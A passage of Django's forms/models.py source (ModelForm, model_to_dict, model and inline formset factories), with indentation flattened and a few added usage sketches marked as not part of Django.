from django.db import models
opts = instance._meta
cleaned_data = form.cleaned_data
file_field_list = []
for f in opts.fields:
if not f.editable or isinstance(f, models.AutoField) \
or f.name not in cleaned_data:
continue
if fields is not None and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
# Leave defaults for fields that aren't in POST data, except for
# checkbox inputs because they don't appear in POST data if not checked.
if (f.has_default() and
form[f.name].field.widget.value_omitted_from_data(form.data, form.files, form.add_prefix(f.name))):
continue
# Defer saving file-type fields until after the other fields, so a
# callable upload_to can use the values from other fields.
if isinstance(f, models.FileField):
file_field_list.append(f)
else:
f.save_form_data(instance, cleaned_data[f.name])
for f in file_field_list:
f.save_form_data(instance, cleaned_data[f.name])
return instance
# ModelForms #################################################################
def model_to_dict(instance, fields=None, exclude=None):
"""
Return a dict containing the data in ``instance`` suitable for passing as
a Form's ``initial`` keyword argument.
    ``fields`` is an optional list of field names. If provided, return only the
    named fields.
    ``exclude`` is an optional list of field names. If provided, exclude the
    named fields from the returned dict, even if they are listed in the
    ``fields`` argument.
"""
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields, opts.many_to_many):
if not getattr(f, 'editable', False):
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
data[f.name] = f.value_from_object(instance)
return data
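# --- Illustrative usage sketch (not part of Django itself) ---
# A minimal, self-contained demonstration of model_to_dict(). The ``Author``
# model and the "demo" app label are hypothetical and exist only for this
# sketch; it runs without a database because the instance is never saved.
if __name__ == "__main__":
    import django
    from django.conf import settings

    settings.configure()
    django.setup()

    from django.db import models as _models

    class Author(_models.Model):
        name = _models.CharField(max_length=100)
        email = _models.EmailField(blank=True)

        class Meta:
            app_label = "demo"

    author = Author(name="Ada Lovelace", email="ada@example.com")
    # -> {'name': 'Ada Lovelace', 'email': 'ada@example.com'}, ready to be
    # passed as a form's ``initial`` argument.
    print(model_to_dict(author))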
def apply_limit_choices_to_to_formfield(formfield):
"""Apply limit_choices_to to the formfield's queryset if needed."""
if hasattr(formfield, 'queryset') and hasattr(formfield, 'get_limit_choices_to'):
limit_choices_to = formfield.get_limit_choices_to()
if limit_choices_to is not None:
formfield.queryset = formfield.queryset.complex_filter(limit_choices_to)
def fields_for_model(model, fields=None, exclude=None, widgets=None,
formfield_callback=None, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
field_classes=None, *, apply_limit_choices_to=True):
"""
Return an ``OrderedDict`` containing form fields for the given model.
``fields`` is an optional list of field names. If provided, return only the
named fields.
``exclude`` is an optional list of field names. If provided, exclude the
named fields from the returned fields, even if they are listed in the
``fields`` argument.
``widgets`` is a dictionary of model field names mapped to a widget.
``formfield_callback`` is a callable that takes a model field and returns
a form field.
``localized_fields`` is a list of names of fields which should be localized.
``labels`` is a dictionary of model field names mapped to a label.
``help_texts`` is a dictionary of model field names mapped to a help text.
``error_messages`` is a dictionary of model field names mapped to a
dictionary of error messages.
``field_classes`` is a dictionary of model field names mapped to a form
field class.
``apply_limit_choices_to`` is a boolean indicating if limit_choices_to
should be applied to a field's queryset.
"""
field_list = []
ignored = []
opts = model._meta
# Avoid circular import
from django.db.models.fields import Field as ModelField
sortable_private_fields = [f for f in opts.private_fields if isinstance(f, ModelField)]
for f in sorted(chain(opts.concrete_fields, sortable_private_fields, opts.many_to_many)):
if not getattr(f, 'editable', False):
if (fields is not None and f.name in fields and
(exclude is None or f.name not in exclude)):
raise FieldError(
"'%s' cannot be specified for %s model form as it is a non-editable field" % (
f.name, model.__name__)
)
continue
if fields is not None and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
kwargs = {}
if widgets and f.name in widgets:
kwargs['widget'] = widgets[f.name]
if localized_fields == ALL_FIELDS or (localized_fields and f.name in localized_fields):
kwargs['localize'] = True
if labels and f.name in labels:
kwargs['label'] = labels[f.name]
if help_texts and f.name in help_texts:
kwargs['help_text'] = help_texts[f.name]
if error_messages and f.name in error_messages:
kwargs['error_messages'] = error_messages[f.name]
if field_classes and f.name in field_classes:
kwargs['form_class'] = field_classes[f.name]
if formfield_callback is None:
formfield = f.formfield(**kwargs)
elif not callable(formfield_callback):
raise TypeError('formfield_callback must be a function or callable')
else:
formfield = formfield_callback(f, **kwargs)
if formfield:
if apply_limit_choices_to:
apply_limit_choices_to_to_formfield(formfield)
field_list.append((f.name, formfield))
else:
ignored.append(f.name)
field_dict = OrderedDict(field_list)
if fields:
field_dict = OrderedDict(
[(f, field_dict.get(f)) for f in fields
if ((not exclude) or (exclude and f not in exclude)) and (f not in ignored)]
)
return field_dict
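# Illustrative note (not part of Django itself): fields_for_model() can also be
# called directly, e.g. to inspect which form fields a hypothetical ``Author``
# model would produce:
#
#     fields_for_model(Author, fields=["name", "email"])
#     # -> OrderedDict([('name', CharField(...)), ('email', EmailField(...))])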
class ModelFormOptions:
def __init__(self, options=None):
self.model = getattr(options, 'model', None)
self.fields = getattr(options, 'fields', None)
self.exclude = getattr(options, 'exclude', None)
self.widgets = getattr(options, 'widgets', None)
self.localized_fields = getattr(options, 'localized_fields', None)
self.labels = getattr(options, 'labels', None)
self.help_texts = getattr(options, 'help_texts', None)
self.error_messages = getattr(options, 'error_messages', None)
self.field_classes = getattr(options, 'field_classes', None)
class ModelFormMetaclass(DeclarativeFieldsMetaclass):
def __new__(mcs, name, bases, attrs):
base_formfield_callback = None
for b in bases:
if hasattr(b, 'Meta') and hasattr(b.Meta, 'formfield_callback'):
base_formfield_callback = b.Meta.formfield_callback
break
formfield_callback = attrs.pop('formfield_callback', base_formfield_callback)
new_class = super(ModelFormMetaclass, mcs).__new__(mcs, name, bases, attrs)
if bases == (BaseModelForm,):
return new_class
opts = new_class._meta = ModelFormOptions(getattr(new_class, 'Meta', None))
# We check if a string was passed to `fields` or `exclude`,
# which is likely to be a mistake where the user typed ('foo') instead
# of ('foo',)
for opt in ['fields', 'exclude', 'localized_fields']:
value = getattr(opts, opt)
if isinstance(value, str) and value != ALL_FIELDS:
msg = ("%(model)s.Meta.%(opt)s cannot be a string. "
"Did you mean to type: ('%(value)s',)?" % {
'model': new_class.__name__,
'opt': opt,
'value': value,
})
raise TypeError(msg)
if opts.model:
# If a model is defined, extract form fields from it.
if opts.fields is None and opts.exclude is None:
raise ImproperlyConfigured(
"Creating a ModelForm without either the 'fields' attribute "
"or the 'exclude' attribute is prohibited; form %s "
"needs updating." % name
)
if opts.fields == ALL_FIELDS:
# Sentinel for fields_for_model to indicate "get the list of
# fields from the model"
opts.fields = None
fields = fields_for_model(
opts.model, opts.fields, opts.exclude, opts.widgets,
formfield_callback, opts.localized_fields, opts.labels,
opts.help_texts, opts.error_messages, opts.field_classes,
# limit_choices_to will be applied during ModelForm.__init__().
apply_limit_choices_to=False,
)
# make sure opts.fields doesn't specify an invalid field
none_model_fields = {k for k, v in fields.items() if not v}
missing_fields = none_model_fields.difference(new_class.declared_fields)
if missing_fields:
message = 'Unknown field(s) (%s) specified for %s'
message = message % (', '.join(missing_fields),
opts.model.__name__)
raise FieldError(message)
# Override default model fields with any custom declared ones
# (plus, include all the other declared fields).
fields.update(new_class.declared_fields)
else:
fields = new_class.declared_fields
new_class.base_fields = fields
return new_class
class BaseModelForm(BaseForm):
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=None,
empty_permitted=False, instance=None, use_required_attribute=None,
renderer=None):
opts = self._meta
if opts.model is None:
raise ValueError('ModelForm has no model class specified.')
if instance is None:
# if we didn't get an instance, instantiate a new one
self.instance = opts.model()
object_data = {}
else:
self.instance = instance
object_data = model_to_dict(instance, opts.fields, opts.exclude)
# if initial was provided, it should override the values from instance
if initial is not None:
object_data.update(initial)
# self._validate_unique will be set to True by BaseModelForm.clean().
# It is False by default so overriding self.clean() and failing to call
# super will stop validate_unique from being called.
self._validate_unique = False
super().__init__(
data, files, auto_id, prefix, object_data, error_class,
label_suffix, empty_permitted, use_required_attribute=use_required_attribute,
renderer=renderer,
)
for formfield in self.fields.values():
apply_limit_choices_to_to_formfield(formfield)
def _get_validation_exclusions(self):
"""
For backwards-compatibility, exclude several types of fields from model
validation. See tickets #12507, #12521, #12553.
"""
exclude = []
# Build up a list of fields that should be excluded from model field
# validation and unique checks.
for f in self.instance._meta.fields:
field = f.name
# Exclude fields that aren't on the form. The developer may be
# adding these values to the model after form validation.
if field not in self.fields:
exclude.append(f.name)
# Don't perform model validation on fields that were defined
# manually on the form and excluded via the ModelForm's Meta
# class. See #12901.
elif self._meta.fields and field not in self._meta.fields:
exclude.append(f.name)
elif self._meta.exclude and field in self._meta.exclude:
exclude.append(f.name)
# Exclude fields that failed form validation. There's no need for
# the model fields to validate them as well.
elif field in self._errors:
exclude.append(f.name)
# Exclude empty fields that are not required by the form, if the
# underlying model field is required. This keeps the model field
# from raising a required error. Note: don't exclude the field from
# validation if the model field allows blanks. If it does, the blank
# value may be included in a unique check, so cannot be excluded
# from validation.
else:
form_field = self.fields[field]
field_value = self.cleaned_data.get(field)
if not f.blank and not form_field.required and field_value in form_field.empty_values:
exclude.append(f.name)
return exclude
def clean(self):
self._validate_unique = True
return self.cleaned_data
def _update_errors(self, errors):
# Override any validation error messages defined at the model level
# with those defined at the form level.
opts = self._meta
# Allow the model generated by construct_instance() to raise
# ValidationError and have them handled in the same way as others.
if hasattr(errors, 'error_dict'):
error_dict = errors.error_dict
else:
error_dict = {NON_FIELD_ERRORS: errors}
for field, messages in error_dict.items():
if (field == NON_FIELD_ERRORS and opts.error_messages and
NON_FIELD_ERRORS in opts.error_messages):
error_messages = opts.error_messages[NON_FIELD_ERRORS]
elif field in self.fields:
error_messages = self.fields[field].error_messages
else:
continue
for message in messages:
if (isinstance(message, ValidationError) and
message.code in error_messages):
message.message = error_messages[message.code]
self.add_error(None, errors)
def _post_clean(self):
opts = self._meta
exclude = self._get_validation_exclusions()
# Foreign Keys being used to represent inline relationships
# are excluded from basic field value validation. This is for two
# reasons: firstly, the value may not be supplied (#12507; the
# case of providing new values to the admin); secondly the
# object being referred to may not yet fully exist (#12749).
# However, these fields *must* be included in uniqueness checks,
# so this can't be part of _get_validation_exclusions().
for name, field in self.fields.items():
if isinstance(field, InlineForeignKeyField):
exclude.append(name)
try:
self.instance = construct_instance(self, self.instance, opts.fields, opts.exclude)
except ValidationError as e:
self._update_errors(e)
try:
self.instance.full_clean(exclude=exclude, validate_unique=False)
except ValidationError as e:
self._update_errors(e)
# Validate uniqueness if needed.
if self._validate_unique:
self.validate_unique()
def validate_unique(self):
"""
Call the instance's validate_unique() method and update the form's
validation errors if any were raised.
"""
exclude = self._get_validation_exclusions()
try:
self.instance.validate_unique(exclude=exclude)
except ValidationError as e:
self._update_errors(e)
def _save_m2m(self):
"""
Save the many-to-many fields and generic relations for this form.
"""
cleaned_data = self.cleaned_data
exclude = self._meta.exclude
fields = self._meta.fields
opts = self.instance._meta
# Note that for historical reasons we want to include also
# private_fields here. (GenericRelation was previously a fake
# m2m field).
for f in chain(opts.many_to_many, opts.private_fields):
if not hasattr(f, 'save_form_data'):
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
if f.name in cleaned_data:
f.save_form_data(self.instance, cleaned_data[f.name])
def save(self, commit=True):
"""
Save this form's self.instance object if commit=True. Otherwise, add
a save_m2m() method to the form which can be called after the instance
is saved manually at a later time. Return the model instance.
"""
if self.errors:
raise ValueError(
"The %s could not be %s because the data didn't validate." % (
self.instance._meta.object_name,
'created' if self.instance._state.adding else 'changed',
)
)
if commit:
# If committing, save the instance and the m2m data immediately.
self.instance.save()
self._save_m2m()
else:
# If not committing, add a method to the form to allow deferred
# saving of m2m data.
self.save_m2m = self._save_m2m
return self.instance
save.alters_data = True
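# Illustrative note (not part of Django itself): the commit=False path above is
# the usual way to tweak an instance before persisting it. A typical,
# hypothetical pattern with some ``ArticleForm`` bound to request data:
#
#     article = form.save(commit=False)   # nothing written to the database yet
#     article.author = request.user       # set fields the form does not cover
#     article.save()                       # persist the instance
#     form.save_m2m()                      # required after commit=False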
class ModelForm(BaseModelForm, metaclass=ModelFormMetaclass):
pass
def modelform_factory(model, form=ModelForm, fields=None, exclude=None,
formfield_callback=None, widgets=None, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
field_classes=None):
"""
Return a ModelForm containing form fields for the given model.
``fields`` is an optional list of field names. If provided, include only
the named fields in the returned fields. If omitted or '__all__', use all
fields.
``exclude`` is an optional list of field names. If provided, exclude the
named fields from the returned fields, even if they are listed in the
``fields`` argument.
``widgets`` is a dictionary of model field names mapped to a widget.
``localized_fields`` is a list of names of fields which should be localized.
``formfield_callback`` is a callable that takes a model field and returns
a form field.
``labels`` is a dictionary of model field names mapped to a label.
``help_texts`` is a dictionary of model field names mapped to a help text.
``error_messages`` is a dictionary of model field names mapped to a
dictionary of error messages.
``field_classes`` is a dictionary of model field names mapped to a form
field class.
"""
# Create the inner Meta class. FIXME: ideally, we should be able to
# construct a ModelForm without creating and passing in a temporary
# inner class.
# Build up a list of attributes that the Meta object will have.
attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if localized_fields is not None:
attrs['localized_fields'] = localized_fields
if labels is not None:
attrs['labels'] = labels
if help_texts is not None:
attrs['help_texts'] = help_texts
if error_messages is not None:
attrs['error_messages'] = error_messages
if field_classes is not None:
attrs['field_classes'] = field_classes
# If parent form class already has an inner Meta, the Meta we're
# creating needs to inherit from the parent's inner meta.
bases = (form.Meta,) if hasattr(form, 'Meta') else ()
Meta = type('Meta', bases, attrs)
if formfield_callback:
Meta.formfield_callback = staticmethod(formfield_callback)
# Give this new form class a reasonable name.
class_name = model.__name__ + 'Form'
# Class attributes for the new form class.
form_class_attrs = {
'Meta': Meta,
'formfield_callback': formfield_callback
}
if (getattr(Meta, 'fields', None) is None and
getattr(Meta, 'exclude', None) is None):
raise ImproperlyConfigured(
"Calling modelform_factory without defining 'fields' or "
"'exclude' explicitly is prohibited."
)
# Instantiate type(form) in order to use the same metaclass as form.
return type(form)(class_name, (form,), form_class_attrs)
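# --- Illustrative usage sketch (not part of Django itself) ---
# Builds a ModelForm class on the fly and validates bound data with it. It
# reuses the hypothetical ``Author`` model and the settings configured in the
# model_to_dict() sketch earlier in this module, so it only applies when the
# module is run as a script.
if __name__ == "__main__":
    AuthorForm = modelform_factory(Author, fields=["name", "email"])
    form = AuthorForm(data={"name": "Ada Lovelace", "email": "ada@example.com"})
    # No database access is needed here: neither field declares a unique
    # constraint, so validation stays entirely in memory.
    print(form.is_valid(), dict(form.cleaned_data))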
# ModelFormSets ##############################################################
class BaseModelFormSet(BaseFormSet):
"""
A ``FormSet`` for editing a queryset and/or adding new objects to it.
"""
model = None
# Set of fields that must be unique among forms of this set.
unique_fields = set()
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
queryset=None, *, initial=None, **kwargs):
self.queryset = queryset
self.initial_extra = initial
super().__init__(**{'data': data, 'files': files, 'auto_id': auto_id, 'prefix': prefix, **kwargs})
def initial_form_count(self):
"""Return the number of forms that are required in this FormSet."""
if not self.is_bound:
return len(self.get_queryset())
return super().initial_form_count()
def _existing_object(self, pk):
if not hasattr(self, '_object_dict'):
self._object_dict = {o.pk: o for o in self.get_queryset()}
return self._object_dict.get(pk)
def _get_to_python(self, field):
"""
If the field is a related field, fetch the concrete field's (that
is, the ultimate pointed-to field's) to_python.
"""
while field.remote_field is not None:
field = field.remote_field.get_related_field()
return field.to_python
def _construct_form(self, i, **kwargs):
pk_required = i < self.initial_form_count()
if pk_required:
if self.is_bound:
pk_key = '%s-%s' % (self.add_prefix(i), self.model._meta.pk.name)
try:
pk = self.data[pk_key]
except KeyError:
# The primary key is missing. The user may have tampered
# with POST data.
pass
else:
to_python = self._get_to_python(self.model._meta.pk)
try:
pk = to_python(pk)
except ValidationError:
# The primary key exists but is an invalid value. The
# user may have tampered with POST data.
pass
else:
kwargs['instance'] = self._existing_object(pk)
else:
kwargs['instance'] = self.get_queryset()[i]
elif self.initial_extra:
# Set initial values for extra forms
try:
kwargs['initial'] = self.initial_extra[i - self.initial_form_count()]
except IndexError:
pass
form = super()._construct_form(i, **kwargs)
if pk_required:
form.fields[self.model._meta.pk.name].required = True
return form
def get_queryset(self):
if not hasattr(self, '_queryset'):
if self.queryset is not None:
qs = self.queryset
else:
qs = self.model._default_manager.get_queryset()
# If the queryset isn't already ordered we need to add an
# artificial ordering here to make sure that all formsets
# constructed from this queryset have the same form order.
if not qs.ordered:
qs = qs.order_by(self.model._meta.pk.name)
# Removed queryset limiting here. As per discussion re: #13023
# on django-dev, max_num should not prevent existing
# related objects/inlines from being displayed.
self._queryset = qs
return self._queryset
def save_new(self, form, commit=True):
"""Save and return a new model instance for the given form."""
return form.save(commit=commit)
def save_existing(self, form, instance, commit=True):
"""Save and return an existing model instance for the given form."""
return form.save(commit=commit)
def delete_existing(self, obj, commit=True):
"""Deletes an existing model instance."""
if commit:
obj.delete()
def save(self, commit=True):
"""
Save model instances for every form, adding and changing instances
as necessary, and return the list of instances.
"""
if not commit:
self.saved_forms = []
def save_m2m():
for form in self.saved_forms:
form.save_m2m()
self.save_m2m = save_m2m
return self.save_existing_objects(commit) + self.save_new_objects(commit)
save.alters_data = True
def clean(self):
self.validate_unique()
def validate_unique(self):
# Collect unique_checks and date_checks to run from all the forms.
all_unique_checks = set()
all_date_checks = set()
forms_to_delete = self.deleted_forms
valid_forms = [form for form in self.forms if form.is_valid() and form not in forms_to_delete]
for form in valid_forms:
exclude = form._get_validation_exclusions()
unique_checks, date_checks = form.instance._get_unique_checks(exclude=exclude)
all_unique_checks.update(unique_checks)
all_date_checks.update(date_checks)
errors = []
# Do each of the unique checks (unique and unique_together)
for uclass, unique_check in all_unique_checks:
seen_data = set()
for form in valid_forms:
# Get the data for the set of fields that must be unique among the forms.
row_data = (
field if field in self.unique_fields else form.cleaned_data[field]
for field in unique_check if field in form.cleaned_data
)
# Reduce Model instances to their primary key values
row_data = tuple(
d._get_pk_val() if hasattr(d, '_get_pk_val')
# Prevent "unhashable type: list" errors later on.
else tuple(d) if isinstance(d, list)
else d for d in row_data
)
if row_data and None not in row_data:
# if we've already seen it then we have a uniqueness failure
if row_data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_unique_error_message(unique_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
for field in unique_check:
if field in form.cleaned_data:
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(row_data)
# iterate over each of the date checks now
for date_check in all_date_checks:
seen_data = set()
uclass, lookup, field, unique_for = date_check
for form in valid_forms:
# see if we have data for both fields
if (form.cleaned_data and form.cleaned_data[field] is not None and
form.cleaned_data[unique_for] is not None):
# if it's a date lookup we need to get the data for all the fields
if lookup == 'date':
date = form.cleaned_data[unique_for]
date_data = (date.year, date.month, date.day)
# otherwise it's just the attribute on the date/datetime
# object
else:
date_data = (getattr(form.cleaned_data[unique_for], lookup),)
data = (form.cleaned_data[field],) + date_data
# if we've already seen it then we have a uniqueness failure
if data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_date_error_message(date_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(data)
if errors:
raise ValidationError(errors)
def get_unique_error_message(self, unique_check):
if len(unique_check) == 1:
return gettext("Please correct the duplicate data for %(field)s.") % {
"field": unique_check[0],
}
else:
return gettext("Please correct the duplicate data for %(field)s, which must be unique.") % {
"field": get_text_list(unique_check, _("and")),
}
def get_date_error_message(self, date_check):
return gettext(
"Please correct the duplicate data for %(field_name)s "
"which must be unique for the %(lookup)s in %(date_field)s."
) % {
'field_name': date_check[2],
'date_field': date_check[3],
'lookup': str(date_check[1]),
}
def get_form_error(self):
return gettext("Please correct the duplicate values below.")
def save_existing_objects(self, commit=True):
self.changed_objects = []
self.deleted_objects = []
if not self.initial_forms:
return []
saved_instances = []
forms_to_delete = self.deleted_forms
for form in self.initial_forms:
obj = form.instance
# If the pk is None, it means either:
# 1. The object is an unexpected empty model, created by invalid
# POST data such as an object outside the formset's queryset.
# 2. The object was already deleted from the database.
if obj.pk is None:
continue
if form in forms_to_delete:
self.deleted_objects.append(obj)
self.delete_existing(obj, commit=commit)
elif form.has_changed():
self.changed_objects.append((obj, form.changed_data))
saved_instances.append(self.save_existing(form, obj, commit=commit))
if not commit:
self.saved_forms.append(form)
return saved_instances
def save_new_objects(self, commit=True):
self.new_objects = []
for form in self.extra_forms:
if not form.has_changed():
continue
# If someone has marked an add form for deletion, don't save the
# object.
if self.can_delete and self._should_delete_form(form):
continue
self.new_objects.append(self.save_new(form, commit=commit))
if not commit:
self.saved_forms.append(form)
return self.new_objects
def add_fields(self, form, index):
"""Add a hidden field for the object's primary key."""
from django.db.models import AutoField, OneToOneField, ForeignKey
self._pk_field = pk = self.model._meta.pk
# If a pk isn't editable, then it won't be on the form, so we need to
# add it here so we can tell which object is which when we get the
# data back. Generally, pk.editable should be false, but for some
# reason, auto_created pk fields and AutoField's editable attribute is
# True, so check for that as well.
def pk_is_not_editable(pk):
return (
(not pk.editable) or (pk.auto_created or isinstance(pk, AutoField)) or (
pk.remote_field and pk.remote_field.parent_link and
pk_is_not_editable(pk.remote_field.model._meta.pk)
)
)
if pk_is_not_editable(pk) or pk.name not in form.fields:
if form.is_bound:
# If we're adding the related instance, ignore its primary key
# as it could be an auto-generated default which isn't actually
# in the database.
pk_value = None if form.instance._state.adding else form.instance.pk
else:
try:
if index is not None:
pk_value = self.get_queryset()[index].pk
else:
pk_value = None
except IndexError:
pk_value = None
if isinstance(pk, (ForeignKey, OneToOneField)):
qs = pk.remote_field.model._default_manager.get_queryset()
else:
qs = self.model._default_manager.get_queryset()
qs = qs.using(form.instance._state.db)
if form._meta.widgets:
widget = form._meta.widgets.get(self._pk_field.name, HiddenInput)
else:
widget = HiddenInput
form.fields[self._pk_field.name] = ModelChoiceField(qs, initial=pk_value, required=False, widget=widget)
super().add_fields(form, index)
def modelformset_factory(model, form=ModelForm, formfield_callback=None,
formset=BaseModelFormSet, extra=1, can_delete=False,
can_order=False, max_num=None, fields=None, exclude=None,
widgets=None, validate_max=False, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
min_num=None, validate_min=False, field_classes=None):
"""Return a FormSet class for the given Django model class."""
meta = getattr(form, 'Meta', None)
if (getattr(meta, 'fields', fields) is None and
getattr(meta, 'exclude', exclude) is None):
raise ImproperlyConfigured(
"Calling modelformset_factory without defining 'fields' or "
"'exclude' explicitly is prohibited."
)
form = modelform_factory(model, form=form, fields=fields, exclude=exclude,
formfield_callback=formfield_callback,
widgets=widgets, localized_fields=localized_fields,
labels=labels, help_texts=help_texts,
error_messages=error_messages, field_classes=field_classes)
FormSet = formset_factory(form, formset, extra=extra, min_num=min_num, max_num=max_num,
can_order=can_order, can_delete=can_delete,
validate_min=validate_min, validate_max=validate_max)
FormSet.model = model
return FormSet
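# Illustrative note (not part of Django itself): a typical, hypothetical use of
# the factory above, editing all ``Author`` rows plus one extra blank form:
#
#     AuthorFormSet = modelformset_factory(Author, fields=["name"], extra=1)
#     formset = AuthorFormSet(queryset=Author.objects.all())  # unbound, for rendering
#     formset = AuthorFormSet(request.POST)                   # bound; then formset.save()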
# InlineFormSets #############################################################
class BaseInlineFormSet(BaseModelFormSet):
"""A formset for child objects related to a parent."""
def __init__(self, data=None, files=None, instance=None,
save_as_new=False, prefix=None, queryset=None, **kwargs):
if instance is None:
self.instance = self.fk.remote_field.model()
else:
self.instance = instance
self.save_as_new = save_as_new
if queryset is None:
queryset = self.model._default_manager
if self.instance.pk is not None:
qs = queryset.filter(**{self.fk.name: self.instance})
else:
qs = queryset.none()
self.unique_fields = {self.fk.name}
super().__init__(data, files, prefix=prefix, queryset=qs, **kwargs)
# Add the generated field to form._meta.fields if it's defined to make
# sure validation isn't skipped on that field.
if self.form._meta.fields and self.fk.name not in self.form._meta.fields:
if isinstance(self.form._meta.fields, tuple):
self.form._meta.fields = list(self.form._meta.fields)
self.form._meta.fields.append(self.fk.name)
def initial_form_count(self):
if self.save_as_new:
return 0
return super().initial_form_count()
def _construct_form(self, i, **kwargs):
form = super()._construct_form(i, **kwargs)
if self.save_as_new:
mutable = getattr(form.data, '_mutable', None)
# Allow modifying an immutable QueryDict.
if mutable is not None:
form.data._mutable = True
# Remove the primary key from the form's data, we are only
# creating new instances
form.data[form.add_prefix(self._pk_field.name)] = None
# Remove the foreign key from the form's data
form.data[form.add_prefix(self.fk.name)] = None
if mutable is not None:
form.data._mutable = mutable
# Set the fk value here so that the form can do its validation.
fk_value = self.instance.pk
if self.fk.remote_field.field_name != self.fk.remote_field.model._meta.pk.name:
fk_value = getattr(self.instance, self.fk.remote_field.field_name)
fk_value = getattr(fk_value, 'pk', fk_value)
setattr(form.instance, self.fk.get_attname(), fk_value)
return form
@classmethod
def get_default_prefix(cls):
return cls.fk.remote_field.get_accessor_name(model=cls.model).replace('+', '')
def save_new(self, form, commit=True):
# Ensure the latest copy of the related instance is present on each
# form (it may have been saved after the formset was originally
# instantiated).
setattr(form.instance, self.fk.name, self.instance)
return super().save_new(form, commit=commit)
def add_fields(self, form, index):
super().add_fields(form, index)
if self._pk_field == self.fk:
name = self._pk_field.name
kwargs = {'pk_field': True}
else:
# The foreign key field might not be on the form, so we poke at the
# Model field to get the label, since we need that for error messages.
name = self.fk.name
kwargs = {
'label': getattr(form.fields.get(name), 'label', capfirst(self.fk.verbose_name))
}
# The InlineForeignKeyField assumes that the foreign key relation is
# based on the parent model's pk. If this isn't the case, set to_field
# to correctly resolve the initial form value.
if self.fk.remote_field.field_name != self.fk.remote_field.model._meta.pk.name:
kwargs['to_field'] = self.fk.remote_field.field_name
# If we're adding a new object, ignore a parent's auto-generated key
# as it will be regenerated on the save request.
if self.instance._state.adding:
if kwargs.get('to_field') is not None:
to_field = self.instance._meta.get_field(kwargs['to_field'])
else:
to_field = self.instance._meta.pk
if to_field.has_default():
setattr(self.instance, to_field.attname, None)
form.fields[name] = InlineForeignKeyField(self.instance, **kwargs)
def get_unique_error_message(self, unique_check):
unique_check = [field for field in unique_check if field != self.fk.name]
return super().get_unique_error_message(unique_check)
def _get_foreign_key(parent_model, model, fk_name=None, can_fail=False):
"""
Find and return the ForeignKey from model to parent if there is one
(return None if can_fail is True and no such field exists). If fk_name is
provided, assume it is the name of the ForeignKey field. Unless can_fail is
True, raise an exception if there isn't a ForeignKey from model to
parent_model.
"""
# avoid circular import
from django.db.models import ForeignKey
opts = model._meta
if fk_name:
fks_to_parent = [f for f in opts.fields if f.name == fk_name]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
if not isinstance(fk, ForeignKey) or \
(fk.remote_field.model != parent_model and
fk.remote_field.model not in parent_model._meta.get_parent_list()):
raise ValueError(
"fk_name '%s' is not a ForeignKey to '%s'." % (fk_name, parent_model._meta.label)
)
elif not fks_to_parent:
raise ValueError(
"'%s' has no field named '%s'." % (model._meta.label, fk_name)
)
else:
# Try to discover what the ForeignKey from model to parent_model is
fks_to_parent = [
f for f in opts.fields
if isinstance(f, ForeignKey) and (
f.remote_field.model == parent_model or
f.remote_field.model in parent_model._meta.get_parent_list()
)
]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
elif not fks_to_parent:
if can_fail:
return
raise ValueError(
"'%s' has no ForeignKey to '%s'." % (
model._meta.label,
parent_model._meta.label,
)
)
else:
raise ValueError(
"'%s' has more than one ForeignKey to '%s'." % (
model._meta.label,
parent_model._meta.label,
)
)
return fk
def inlineformset_factory(parent_model, model, form=ModelForm,
formset=BaseInlineFormSet, fk_name=None,
fields=None, exclude=None, extra=3, can_order=False,
can_delete=True, max_num=None, formfield_callback=None,
widgets=None, validate_max=False, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
min_num=None, validate_min=False, field_classes=None):
"""
Return an ``InlineFormSet`` for the given kwargs.
``fk_name`` must be provided if ``model`` has more than one ``ForeignKey``
to ``parent_model``.
"""
fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
# enforce a max_num=1 when the foreign key to the parent model is unique.
if fk.unique:
max_num = 1
kwargs = {
'form': form,
'formfield_callback': formfield_callback,
'formset': formset,
'extra': extra,
'can_delete': can_delete,
'can_order': can_order,
'fields': fields,
'exclude': exclude,
'min_num': min_num,
'max_num': max_num,
'widgets': widgets,
'validate_min': validate_min,
'validate_max': validate_max,
'localized_fields': localized_fields,
'labels': labels,
'help_texts': help_texts,
'error_messages': error_messages,
'field_classes': field_classes,
}
FormSet = modelformset_factory(model, **kwargs)
FormSet.fk = fk
return FormSet
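# Illustrative note (not part of Django itself): a typical, hypothetical use of
# the factory above, editing ``Book`` children of an ``Author`` parent (where
# ``Book`` has a ForeignKey to ``Author``):
#
#     BookFormSet = inlineformset_factory(Author, Book, fields=["title"], extra=2)
#     formset = BookFormSet(instance=some_author)   # only that author's books
#     if formset.is_valid():
#         formset.save()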
# Fields #####################################################################
class InlineForeignKeyField(Field):
"""
    A basic integer field that validates that the given value matches the
    parent instance in an inline.
"""
widget = HiddenInput
default_error_messages = {
'invalid_choice': _('The inline value did not match the parent instance.'),
}
def __init__(self, parent_instance, *args, pk_field=False, to_field=None, **kwargs):
self.parent_instance = parent_instance
self.pk_field = pk_field
self.to_field = to_field
if self.parent_instance is not None:
if self.to_field:
kwargs["initial"] = getattr(self.parent_instance, self.to_field)
else:
kwargs["initial"] = self.parent_instance.pk
kwargs["required"] = False
super().__init__(*args, **kwargs)
def clean(self, value):
if value in self.empty_values:
if self.pk_field:
return None
            # if there is no value, fall back to the parent instance.
